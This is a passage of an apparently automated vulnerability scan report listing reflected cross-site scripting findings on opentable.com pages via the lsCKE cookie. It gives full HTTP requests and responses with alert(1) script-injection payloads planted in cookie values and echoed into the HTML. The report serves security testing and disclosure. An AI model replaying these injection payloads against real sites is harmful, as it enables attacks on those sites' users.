Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=9&vbefreg=9&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=9&vbefreg=9&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<!--
var s_account="otrestref86571"-alert(1)-"6df2532a40d";
//-->
...[SNIP]...
4.90. http://www.opentable.com/opentables.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b9d"><script>alert(1)</script>274d9f2ce68 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1=100&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...
4.91. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f96d"><script>alert(1)</script>5ac8eae4578 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a01&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=8&vbefreg=8&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=8&vbefreg=8&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV25wOFHxjGvbfxb0e%2fAJElb; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestref3f96d"><script>alert(1)</script>5ac8eae4578/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...
4.92. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79263"-alert(1)-"082a2fb7275 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a01&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=20&vbefreg=20&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=20&vbefreg=20&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
